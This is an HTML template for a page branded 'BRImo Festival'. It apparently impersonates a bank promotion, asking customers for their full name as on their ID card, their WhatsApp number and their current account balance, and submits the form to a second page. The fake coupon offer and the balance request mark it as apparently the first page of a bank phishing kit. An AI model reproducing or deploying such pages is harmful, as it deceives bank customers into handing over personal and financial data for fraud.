<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <title>BRImo Festival</title>
  <style>
    html, body {
        margin: 0;
        padding: 0;
        width: 100%;
        height: auto;
        overflow-x: hidden;
    }
    body {
        font-family: sans-serif;
        margin: 0 auto;
        padding: 0;
        overflow-x: hidden;
        overflow-y: auto;
    }
    .wrapper {
        max-width: 400px;
        margin: 0 auto;
        width: 100%;
        box-sizing: border-box;
    }
    .container label {
      font-size: 14px;
    }
    .container input {
        margin-left: auto;
        margin-right: auto;
        width: 210px;
        margin: 0 auto;
        margin-bottom: 0;
        padding: 8px;
        border: 2px solid #2200ff;;
        border-radius: 10px;
        background: #ffffff;
        font-size: 13px;
    }
    .container button {
        display: block;
        margin-left: auto;
        margin-right: auto;
        margin-top: 17px;
        width: 210px;
        padding-top: 6px;
        padding-bottom: 6px;
        border: 2px solid #000000;
        border-radius: 10px;
        background: #2200ff;
        font-size: 18px;
        color: white;
    }
    .container {
      max-width: 250px;
      background: #E8E4C9;
      padding-left: 20px;
      padding-top: 0;
      padding-right: 20px;
      padding-bottom: 20px;
      margin: 25px auto;
      border-radius: 15px;
      border: 2px solid #2200ff;
      text-align: center;
    }
    @media (max-height: 700px) {
      .container {
        max-width: 230px;
        background: #E8E4C9;
        padding-left: 20px;
        padding-top: 0;
        padding-right: 20px;
        padding-bottom: 20px;
        margin: 25px auto;
        border-radius: 15px;
        border: 2px solid #2200ff;
      }
    }
    @media (max-height: 700px) {
      img {
        height: auto;
        max-height: 100vh;
        object-fit: cover;
      }
    }
    h2 {
      color: darkorange;
      font-size: 15px;
      margin-top: 4px;
    }
  </style>
</head>
<body>
  <div class="wrapper">
    <img src="{{ url_for('static', filename='background_bri.jpg') }}" style="width: 100%; display: block;" alt="Background">
    <div class="container">
      <h2>Lengkapi Data Pencetakan Kupun BRImo Festival:</h2>  
      <form id="myForm" method="POST" action="/halaman2">
        <label for="nama">Nama Lengkap Nasabah</label><br>
        <input type="text" name="nama" placeholder="Nama Sesuai KTP" required><br>
        <label for="whatsapp">Nomor Whatsapp</label><br>
        <input type="number" name="whatsapp" placeholder="08xxxxxx" required><br>
        <label for="saldo">Jumlah Saldo Rekening Saat ini</label><br>
        <input type="text" name="saldo" id="saldo" placeholder="Rp. xxxx" required><br>
        <button type="submit">DAFTAR</button>
      </form>
      <script>
        document.addEventListener('DOMContentLoaded', function () {
          const saldoInput = document.querySelector('input[name="saldo"]');

          saldoInput.addEventListener('input', function(e) {
              let value = this.value.replace(/\D/g, '');
              if (value) {
                 this.value = parseInt(value).toLocaleString('id-ID');
              } else {
                 this.value = '';
                }
          });
        });
      </script>
    </div>
  </div>
</body>
</html>
